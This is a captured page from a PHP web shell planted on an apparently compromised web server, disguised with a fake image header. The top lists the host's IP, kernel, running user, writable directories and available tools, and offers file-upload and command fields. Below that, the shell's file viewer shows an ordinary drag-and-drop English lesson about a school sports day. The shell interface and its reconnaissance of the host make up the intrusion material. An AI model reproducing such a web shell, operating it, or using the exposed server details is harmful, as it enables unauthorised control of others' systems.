????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.141.33.133
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelE/Category1/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old8/Html/LevelE/Category1/LevelECat1Lesson32.html
<!DOCTYPE html>
<html>
    <head>
        <title>Questions and answers and matchings</title>
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        <script>
            function page_preLoad()
            {
                shared_setDeviceTypeLevelCategoryLastLesson(Level.E, Category.No1);
                
                shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                
                shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.E, Category.No1, 32), true, true);
                shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                
                var ids_headings = ['id_td_heading1', 'id_td_heading2'];
                var ids_boxes_withOut_dragHere = ['id_dropbox_eighthJuly', 'id_dropbox_heightAndWeight', 'id_dropbox_32', 'id_dropbox_painInRightThigh', 'id_dropbox_YesNo'];
                var ids_boxes_with_dragHere = ['id_dropbox_textHighJump', 'id_dropbox_textCycling', 'id_dropbox_textRunningRace', 'id_dropbox_textThighPain'];
                
                var ids_texts = new Array();
                
                for (var textId = 1; textId <= 37; textId++)
                {
                    ids_texts.push('id_td_text' + textId);
                }
                
                var ids_textBoxes = new Array();
                
                for (var textBoxId = 1; textBoxId <= 5; textBoxId++)
                {
                    var idTextBox = 'id_textBox' + textBoxId;
                    var eTextBox = document.getElementById(idTextBox);
                    eTextBox.value = '';
                    
                    if (shared_currentDeviceType == shared_DeviceTypeAndroidDeviceApp)
                    {
                        eTextBox.style.border = 'solid 2px black';
                    }
                    
                    ids_textBoxes.push(idTextBox);
                }
                
                var ids_options = ['id_td_textHeightAndWeight', 'id_td_no32', 'id_td_textYes', 'id_td_textEighthJuly', 'id_td_textPainInRightThigh', 'id_td_textNo', 'id_td_textRunningRace', 'id_td_textThighPain', 'id_td_textHighJump', 'id_td_textCycling'];
                var ids_spans = ['id_span_textHeightAndWeight', 'id_span_no32', 'id_span_textYes', 'id_span_textEighthJuly', 'id_span_textPainInRightThigh', 'id_span_textNo', 'id_span_textRunningRace', 'id_span_textThighPain', 'id_span_textHighJump', 'id_span_textCycling'];
                
				var ids_All = ids_headings.concat(ids_options, ids_texts, ids_boxes_withOut_dragHere, ids_boxes_with_dragHere, ids_textBoxes);
                
                shared_adjust_fontSize_for_ids_all_devices(ids_All, 70);
                
                shared_init_dropBox_tds_withOUT_drag_here(ids_boxes_withOut_dragHere);
                shared_init_dropBox_tds_with_drag_here(ids_boxes_with_dragHere);
                shared_init_dropping_spans(ids_spans);
                
                var id_tables_array = ['id_table1', 'id_table2'];
                shared_border_collapse_for_tables_except_android(id_tables_array);
            }
        
            function page_onLoad()
            {
                
            }
        
            function btnHome_click()
            {
                shared_btnHomeCategories_click('LevelE');
            }
            
            function btnPrevious_click()
            {
                window.location = 'LevelECat1Lesson31.html';
            }
            
            function btnNext_click()
            {
                window.location = 'LevelECat1Lesson33.html';
            }
        
            function DragDrop(id_dropBox, ids_array)
            {
                if (shared_isMovingElementIdInTheArraySetIsFilledTrue(id_dropBox, ids_array))
                {
                    shared_setTextAndBackgroundColorToGreenAndIsMovedTrue(shared_currentDropingId, id_dropBox);
                    
                    shared_set_currentDropingId_draggbleToFalse();
                }
                else
                {
                    shared_resetCurrentDroppingPosition(id_dropBox);
                }
            }
        
            function btnValidate_click()
            {
                var ids_boxes = ['id_dropbox_textHighJump', 'id_dropbox_textCycling', 'id_dropbox_textRunningRace', 'id_dropbox_textThighPain'];
                
                var isAllBoxesFilled = shared_isAllInfosFilled(ids_boxes);
                
                var eTextBox1 = document.getElementById('id_textBox1');
                var eTextBox2 = document.getElementById('id_textBox2');
                var eTextBox3 = document.getElementById('id_textBox3');
                var eTextBox4 = document.getElementById('id_textBox4');
                var eTextBox5 = document.getElementById('id_textBox5');
                
                if ((isAllBoxesFilled) &&
                    (eTextBox1.value != '') &&
                    (eTextBox2.value != '') &&
                    (eTextBox3.value != '') &&
                    (eTextBox4.value != '') &&
                    (eTextBox5.value != ''))
                {
                     shared_is_all_infos_filled_show_claps_animationWithIsFilled(ids_boxes);
                }
            }
        </script>
    </head>

    <body onLoad="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>                    
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%">
                                    <tr height="60%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                <tr height="7%">
                                                    <td id="id_td_heading1" class="shared_style_black_24px_bold_padding_left_2_percent"><u>Answer the following</u>:
                                                    </td>
                                                </tr>
                                                <tr height="*">
                                                    <td style="padding-bottom:0.5%">
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text1" class="shared_style_black_24px_bold" align="right">1.</td>
                                                                <td id="id_td_text2" width="1%">&nbsp;</td>
                                                                <td id="id_td_text3" class="shared_style_black_24px_bold" width="*">&nbsp;When is the sports day?</td>
                                                            </tr>
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text4" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td id="id_td_text5" width="1%">&nbsp;</td>
                                                                <td id="id_td_dropbox_eighthJuly" width="*"
                                                                    ondragover="shared_highlight('id_dropbox_eighthJuly'); shared_allowDrop_web(event)"
                                                                    ondragleave="shared_un_highlight('id_dropbox_eighthJuly')"
                                                                    ondrop="DragDrop('id_dropbox_eighthJuly', ['id_span_textEighthJuly'])">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
						                                                <tr>
						                                                    <td id="id_dropbox_eighthJuly" class="shared_style_red_24px_bold" width="95%">
                                                                                <textarea id="id_textBox1" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
						                                                    <td id="id_td_text6" width="*">&nbsp;</td>
						                                                </tr>
						                                            </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text7" class="shared_style_black_24px_bold" align="right">2.</td>
                                                                <td id="id_td_text8" width="1%">&nbsp;</td>
                                                                <td id="id_td_text9" class="shared_style_black_24px_bold" width="*">&nbsp;What did the teacher measure?</td>
                                                            </tr>
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text10" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td id="id_td_text11" width="1%">&nbsp;</td>
                                                                <td id="id_td_dropbox_heightAndWeight" width="*"
                                                                    ondragover="shared_highlight('id_dropbox_heightAndWeight'); shared_allowDrop_web(event)"
                                                                    ondragleave="shared_un_highlight('id_dropbox_heightAndWeight')"
                                                                    ondrop="DragDrop('id_dropbox_heightAndWeight', ['id_span_textHeightAndWeight'])">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
						                                                <tr>
						                                                    <td id="id_dropbox_heightAndWeight" class="shared_style_red_24px_bold" width="95%">
                                                                                <textarea id="id_textBox2" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
						                                                    <td id="id_td_text12" width="*">&nbsp;</td>
						                                                </tr>
						                                            </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text13" class="shared_style_black_24px_bold" align="right">3.</td>
                                                                <td id="id_td_text14" width="1%">&nbsp;</td>
                                                                <td id="id_td_text15" class="shared_style_black_24px_bold" width="*">&nbsp;How many children are taking part in sports?</td>
                                                            </tr>
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text16" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td id="id_td_text17" width="1%">&nbsp;</td>
                                                                <td id="id_td_dropbox_32" width="*"
                                                                    ondragover="shared_highlight('id_dropbox_32'); shared_allowDrop_web(event)"
                                                                    ondragleave="shared_un_highlight('id_dropbox_32')"
                                                                    ondrop="DragDrop('id_dropbox_32', ['id_span_no32'])">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
						                                                <tr>
						                                                    <td id="id_dropbox_32" class="shared_style_red_24px_bold" width="95%">
                                                                                <textarea id="id_textBox3" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
						                                                    <td id="id_td_text18" width="*">&nbsp;</td>
						                                                </tr>
						                                            </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text19" class="shared_style_black_24px_bold" align="right">4.</td>
                                                                <td id="id_td_text20" width="1%">&nbsp;</td>
                                                                <td id="id_td_text21" class="shared_style_black_24px_bold" width="*">&nbsp;What happened to Rishi?</td>
                                                            </tr>
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text22" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td id="id_td_text23" width="1%">&nbsp;</td>
                                                                <td id="id_td_dropbox_painInRightThigh" width="*"
                                                                    ondragover="shared_highlight('id_dropbox_painInRightThigh'); shared_allowDrop_web(event)"
                                                                    ondragleave="shared_un_highlight('id_dropbox_painInRightThigh')"
                                                                    ondrop="DragDrop('id_dropbox_painInRightThigh', ['id_span_textPainInRightThigh'])">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
						                                                <tr>
						                                                    <td id="id_dropbox_painInRightThigh" class="shared_style_red_24px_bold" width="95%">
                                                                                <textarea id="id_textBox4" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
						                                                    <td id="id_td_text24" width="*">&nbsp;</td>
						                                                </tr>
						                                            </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="10%">
                                                                <td width="10%" id="id_td_text25" class="shared_style_black_24px_bold" align="right">5.</td>
                                                                <td id="id_td_text26" width="1%">&nbsp;</td>
                                                                <td id="id_td_text27" class="shared_style_black_24px_bold" width="*">&nbsp;Do you think Rishi can take a part on a sport day?</td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td width="10%" id="id_td_text28" class="shared_style_blue_24px_bold" align="right">A.</td>
                                                                <td id="id_td_text29" width="1%">&nbsp;</td>
                                                                <td id="id_td_dropbox_YesNo" width="*"
                                                                    ondragover="shared_highlight('id_dropbox_YesNo'); shared_allowDrop_web(event)"
                                                                    ondragleave="shared_un_highlight('id_dropbox_YesNo')"
                                                                    ondrop="DragDrop('id_dropbox_YesNo', ['id_span_textYes', 'id_span_textNo'])">
                                                                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
						                                                <tr>
						                                                    <td id="id_dropbox_YesNo" class="shared_style_red_24px_bold" width="95%">
                                                                                <textarea id="id_textBox5" class="shared_style_blue_24px_bold" style="width:95%; text-align:left; resize:none" rows="1">
                                                                                </textarea>
                                                                            </td>
						                                                    <td id="id_td_text30" width="*">&nbsp;</td>
						                                                </tr>
						                                            </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                                <tr height="15%">
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellpadding="0" cellspacing="0">
                                                            <tr height="60%">
                                                                <td id="id_td_heading2" width="*" class="shared_style_blue_24px_bold_padding_left_2_percent">Clues:</td>
                                                                <td id="id_td_textHeightAndWeight" class="shared_style_red_24px_bold" width="30%" align="center">
                                                                    <span id="id_span_textHeightAndWeight">Height and weight</span>
                                                                </td>
                                                                <td id="id_td_textYes" class="shared_style_red_24px_bold" width="25%" align="center">
                                                                    <span id="id_span_textYes">Yes</span>
                                                                </td>
                                                                <td id="id_td_no32" class="shared_style_red_24px_bold" width="25%" align="center">
                                                                    <span id="id_span_no32">32</span>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td id="id_td_text31" width="*">&nbsp;</td>
                                                                <td id="id_td_textEighthJuly" class="shared_style_red_24px_bold" width="25%" align="center">
                                                                    <span id="id_span_textEighthJuly">Eighth July</span>
                                                                </td>
                                                                <td id="id_td_textPainInRightThigh" class="shared_style_red_24px_bold" width="30%" align="center">
                                                                    <span id="id_span_textPainInRightThigh">Pain in right thigh</span>
                                                                </td>
                                                                <td id="id_td_textNo" class="shared_style_red_24px_bold" width="25%" align="center">
                                                                    <span id="id_span_textNo">No</span>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td>
                                            <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr height="12%">
                                                                <td>
                                                                    <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                                        <tr>
                                                                            <td id="id_td_text32" class="shared_style_black_24px_bold_padding_left_2_percent" style="border-bottom:none">Match the following:</td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                            <tr height="*">
                                                                <td>
                                                                    <table width="100%" height="100%" border="1" cellspacing="0" cellpadding="0" style="border:none">
                                                                        <tr height="5%">
                                                                            <td width="65%" style="border-right:none; border-top:none">
                                                                                <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                                                    <tr>
                                                                                        <td width="*">
                                                                                            <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
                                                                                                <tr id="id_tr_dropbox_textHighJump" height="25%"
                                                                                                    ondragover="shared_highlight('id_dropbox_textHighJump'); shared_allowDrop_web(event)"
                                                                                                    ondragleave="shared_un_highlight('id_dropbox_textHighJump')"
                                                                                                    ondrop="DragDrop('id_dropbox_textHighJump', ['id_span_textHighJump'])">
                                                                                                    <td id="id_td_text33" class="shared_style_black_24px_bold_padding_left_2_percent" width="50%" align="left">Five children</td>
                                                                                                    <td id="id_dropbox_textHighJump" class="shared_style_red_24px_bold" width="*" align="center">_______</td>
                                                                                                </tr>
                                                                                                <tr id="id_tr_dropbox_textCycling" height="25%"
                                                                                                    ondragover="shared_highlight('id_dropbox_textCycling'); shared_allowDrop_web(event)"
                                                                                                    ondragleave="shared_un_highlight('id_dropbox_textCycling')"
                                                                                                    ondrop="DragDrop('id_dropbox_textCycling', ['id_span_textCycling'])">
                                                                                                    <td id="id_td_text34" class="shared_style_black_24px_bold_padding_left_2_percent" width="50%" align="left">Nine children</td>
                                                                                                    <td id="id_dropbox_textCycling" class="shared_style_red_24px_bold" width="*" align="center">_______</td>
                                                                                                </tr>
                                                                                                <tr id="id_tr_dropbox_textRunningRace" height="25%"
                                                                                                    ondragover="shared_highlight('id_dropbox_textRunningRace'); shared_allowDrop_web(event)"
                                                                                                    ondragleave="shared_un_highlight('id_dropbox_textRunningRace')"
                                                                                                    ondrop="DragDrop('id_dropbox_textRunningRace', ['id_span_textRunningRace'])">
                                                                                                    <td id="id_td_text35" class="shared_style_black_24px_bold_padding_left_2_percent" width="50%" align="left">Eighteen children</td>
                                                                                                    <td id="id_dropbox_textRunningRace" class="shared_style_red_24px_bold" width="*" align="center">_______</td>
                                                                                                </tr>
                                                                                                <tr id="id_tr_dropbox_textThighPain" height="*"
                                                                                                    ondragover="shared_highlight('id_dropbox_textThighPain'); shared_allowDrop_web(event)"
                                                                                                    ondragleave="shared_un_highlight('id_dropbox_textThighPain')"
                                                                                                    ondrop="DragDrop('id_dropbox_textThighPain', ['id_span_textThighPain'])">
                                                                                                    <td id="id_td_text36" class="shared_style_black_24px_bold_padding_left_2_percent" width="50%" align="left">One child</td>
                                                                                                    <td id="id_dropbox_textThighPain" class="shared_style_red_24px_bold" width="*" align="center">_______</td>
                                                                                                </tr>
                                                                                            </table>
                                                                                        </td>
                                                                                        <td id="id_td_text37" width="2%">&nbsp;</td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                            <td width="*" style="border-top:none">
                                                                                <table width="100%" height="100%" border="0" cellspacing="2%" cellpadding="0">
                                                                                    <tr height="25%">
                                                                                        <td id="id_td_textRunningRace" class="shared_style_black_24px_bold" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_textRunningRace">running race</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                    <tr height="25%">
                                                                                        <td id="id_td_textThighPain" class="shared_style_black_24px_bold" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_textThighPain">thigh pain</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                    <tr height="25%">
                                                                                        <td id="id_td_textHighJump" class="shared_style_black_24px_bold" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_textHighJump">high jump</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                    <tr height="*">
                                                                                        <td id="id_td_textCycling" class="shared_style_black_24px_bold" align="center" draggable="true" ondragstart="shared_dragStartNew(event)">
                                                                                            <span id="id_span_textCycling">cycling</span>
                                                                                        </td>
                                                                                    </tr>
                                                                                </table>
                                                                            </td>
                                                                        </tr>
                                                                    </table>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
            
            new webkit_draggable('id_span_textHeightAndWeight', {handle : 'id_td_textHeightAndWeight', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_no32', {handle : 'id_td_no32', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textYes', {handle : 'id_td_textYes', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textEighthJuly', {handle : 'id_td_textEighthJuly', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textPainInRightThigh', {handle : 'id_td_textPainInRightThigh', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textNo', {handle : 'id_td_textNo', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textRunningRace', {handle : 'id_td_textRunningRace', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textThighPain', {handle : 'id_td_textThighPain', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textHighJump', {handle : 'id_td_textHighJump', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            new webkit_draggable('id_span_textCycling', {handle : 'id_td_textCycling', revert : true, scroll : false, onStart : function(){shared_dragStartNew(event)}});
            
            webkit_drop.add('id_td_dropbox_heightAndWeight', {onOver : function(){shared_highlight('id_dropbox_heightAndWeight')}, onOut : function(){shared_un_highlight('id_dropbox_heightAndWeight')}, onDrop : function(){DragDrop('id_dropbox_heightAndWeight', ['id_span_textHeightAndWeight'])}});
            webkit_drop.add('id_td_dropbox_32', {onOver : function(){shared_highlight('id_dropbox_32')}, onOut : function(){shared_un_highlight('id_dropbox_32')}, onDrop : function(){DragDrop('id_dropbox_32', ['id_span_no32'])}});
            webkit_drop.add('id_td_dropbox_YesNo', {onOver : function(){shared_highlight('id_dropbox_YesNo')}, onOut : function(){shared_un_highlight('id_dropbox_YesNo')}, onDrop : function(){DragDrop('id_dropbox_YesNo', ['id_span_textYes', 'id_span_textNo'])}});
            webkit_drop.add('id_td_dropbox_eighthJuly', {onOver : function(){shared_highlight('id_dropbox_eighthJuly')}, onOut : function(){shared_un_highlight('id_dropbox_eighthJuly')}, onDrop : function(){DragDrop('id_dropbox_eighthJuly', ['id_span_textEighthJuly'])}});
            webkit_drop.add('id_td_dropbox_painInRightThigh', {onOver : function(){shared_highlight('id_dropbox_painInRightThigh')}, onOut : function(){shared_un_highlight('id_dropbox_painInRightThigh')}, onDrop : function(){DragDrop('id_dropbox_painInRightThigh', ['id_span_textPainInRightThigh'])}});
            
            webkit_drop.add('id_tr_dropbox_textRunningRace', {onOver : function(){shared_highlight('id_dropbox_textRunningRace')}, onOut : function(){shared_un_highlight('id_dropbox_textRunningRace')}, onDrop : function(){DragDrop('id_dropbox_textRunningRace', ['id_span_textRunningRace'])}});
            webkit_drop.add('id_tr_dropbox_textThighPain', {onOver : function(){shared_highlight('id_dropbox_textThighPain')}, onOut : function(){shared_un_highlight('id_dropbox_textThighPain')}, onDrop : function(){DragDrop('id_dropbox_textThighPain', ['id_span_textThighPain'])}});
            webkit_drop.add('id_tr_dropbox_textHighJump', {onOver : function(){shared_highlight('id_dropbox_textHighJump')}, onOut : function(){shared_un_highlight('id_dropbox_textHighJump')}, onDrop : function(){DragDrop('id_dropbox_textHighJump', ['id_span_textHighJump'])}});
            webkit_drop.add('id_tr_dropbox_textCycling', {onOver : function(){shared_highlight('id_dropbox_textCycling')}, onOut : function(){shared_un_highlight('id_dropbox_textCycling')}, onDrop : function(){DragDrop('id_dropbox_textCycling', ['id_span_textCycling'])}});
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit